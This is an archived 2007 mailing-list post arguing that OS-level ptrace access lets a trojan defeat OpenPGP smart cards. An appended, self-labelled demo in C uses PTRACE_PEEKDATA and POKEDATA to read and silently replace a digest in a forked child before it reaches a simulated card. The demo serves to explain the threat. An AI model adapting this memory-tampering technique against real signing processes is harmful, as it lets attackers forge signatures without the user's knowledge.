Old PC as Hardware Security Module?

Zeljko Vrba zvrba at globalnet.hr
Mon May 14 16:21:54 CEST 2007

"Robert J. Hansen" <rjh at sixdemonbag.org> writes:

>> What prevents the keylogger in your first example from snarfing the PIN code
>> for the OpenPGP card and send decryption requests to the OpenPGP card,
>> using the PIN code, in the background, possibly remotely controlled
>> over the network?
> There exist cryptographic smart cards you can actually be safe
> against this kind of attack with.  They're pretty cool.  I don't know
The smart card has nothing to do with it.  It's the OS that has to defend against
this type of attack.  AFAIK, no widespread OS does it today.  On Linux, you
can strace any application and see all I/O done by the program.  On Windows
you have an even more powerful debugging/interception API.  Windows is slightly
better here because an administrator can revoke the "Debug Privilege" from a
user account.  Thus the user can't debug their own programs, but neither can
the trojans, so it makes running sensitive applications slightly safer.

As long as the OS allows ptrace/equivalent calls which inspect and modify data and
code in another process, there's NO WAY to prevent this attack.  Not even a
separate PIN entry device helps, because the trojan may still attach itself to
(e.g.) the GnuPG executable and modify data (e.g. the to-be-signed hash) in memory
before it's sent to the smart card.

Intel once had a whitepaper on LaGrande technology where every application
would be cryptographically protected *in hardware* from any other application.
Each app would have a cryptographically protected channel with I/O devices,
and even memory regions.  Such an environment would fully protect applications
like GnuPG.  But, AFAIK, it remained only a whitepaper.

> The question isn't whether smart cards are secure--nothing that's got  
> that much RAM and processor power ever is--but whether smart cards  
> are a security improvement.
My personal opinion is that, at the current state of "security" in today's
OSes, smart cards give just a false sense of security in typical usage
scenarios (= when used on a general-purpose, networked workstation).

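The attack described in the post above (a trojan attaching to a process with ptrace, reading the to-be-signed hash out of its memory and rewriting it before the process hands it to the card) is shown below as an added example; it is not code from the post, from GnuPG or from the list.  It is Linux-only and makes a few simplifying assumptions: the "victim" is a forked child rather than a real gpg process, so the tracer already knows the digest's address (after fork() the child's copy of a global sits at the same address; a real trojan would look it up via /proc/PID/maps or the binary's symbols); the "card" is a pipe back to the parent; and the digest bytes (0x11 for the genuine hash, 0xEE for the substituted one) are constructed, not real hashes.  The child asks to be traced with PTRACE_TRACEME, so it works even under Yama ptrace_scope=1.

```c
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define DIGEST_LEN 32          /* one SHA-256 digest, the size GnuPG sends to the card */
#define REAL_BYTE  0x11        /* constructed: the hash the user meant to sign */
#define EVIL_BYTE  0xEE        /* constructed: the hash the trojan substitutes */

/* Global so that, after fork(), the child's copy sits at the same address as
   the parent's. (Assumption for the demo; a real trojan would locate it via
   /proc/PID/maps or the victim's symbols.) */
static unsigned char digest[DIGEST_LEN];

/* The victim: compute the digest, then hand it to the "card" (a pipe here).
   The SIGSTOP stands in for any point at which a tracer may interpose. */
static void victim(int card_fd) {
    memset(digest, REAL_BYTE, DIGEST_LEN);
    if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == 0)
        raise(SIGSTOP);                       /* the tracer gets control here */
    if (write(card_fd, digest, DIGEST_LEN) != DIGEST_LEN)
        _exit(1);
    _exit(0);
}

/* The trojan: read the victim's digest word by word (exactly what strace or
   gdb do), then overwrite it in place, then let the victim run on.
   Returns 0 on success, -1 if any ptrace call failed. */
static int inspect_and_tamper(pid_t child, unsigned char seen[DIGEST_LEN]) {
    for (size_t off = 0; off < DIGEST_LEN; off += sizeof(long)) {
        errno = 0;
        long word = ptrace(PTRACE_PEEKDATA, child, digest + off, NULL);
        if (word == -1 && errno != 0)
            return -1;
        memcpy(seen + off, &word, sizeof word);
    }
    for (size_t off = 0; off < DIGEST_LEN; off += sizeof(long)) {
        long word;
        memset(&word, EVIL_BYTE, sizeof word);
        if (ptrace(PTRACE_POKEDATA, child, digest + off, (void *)word) == -1)
            return -1;
    }
    return ptrace(PTRACE_DETACH, child, NULL, NULL) == -1 ? -1 : 0;
}

/* Runs the scenario. Fills `seen` with what the trojan read and `sent` with
   what the card actually received. Returns 1 if the card got the substituted
   digest, 0 if ptrace was unavailable and the genuine digest went through
   untouched, -1 on any other failure. */
int tamper_demo(unsigned char seen[DIGEST_LEN], unsigned char sent[DIGEST_LEN]) {
    int fds[2], status, traced = 0;
    if (pipe(fds) == -1) return -1;
    pid_t child = fork();
    if (child == -1) return -1;
    if (child == 0) { close(fds[0]); victim(fds[1]); }
    close(fds[1]);
    if (waitpid(child, &status, 0) == -1) return -1;   /* stop, or exit if untraced */
    if (WIFSTOPPED(status)) {
        traced = 1;
        if (inspect_and_tamper(child, seen) == -1) {
            kill(child, SIGKILL);
            return -1;
        }
    }
    size_t got = 0;                                     /* what the "card" receives */
    while (got < DIGEST_LEN) {
        ssize_t n = read(fds[0], sent + got, DIGEST_LEN - got);
        if (n <= 0) return -1;
        got += (size_t)n;
    }
    close(fds[0]);
    waitpid(child, NULL, 0);
    if (!traced) { memcpy(seen, sent, DIGEST_LEN); return 0; }
    return sent[0] == EVIL_BYTE ? 1 : -1;
}

int main(void) {
    unsigned char seen[DIGEST_LEN], sent[DIGEST_LEN];
    int r = tamper_demo(seen, sent);
    printf("result=%d  trojan read 0x%02x..  card received 0x%02x..\n",
           r, seen[0], sent[0]);
    return r == 1 ? 0 : 1;
}
```

A separate PIN pad changes nothing here: the PIN was never touched, and the card signs the bytes it receives exactly as it is supposed to.  The only defences are outside the card, in the OS (no PEEK/POKE into a sensitive process by a same-UID trojan) or in the hardware isolation the post mentions.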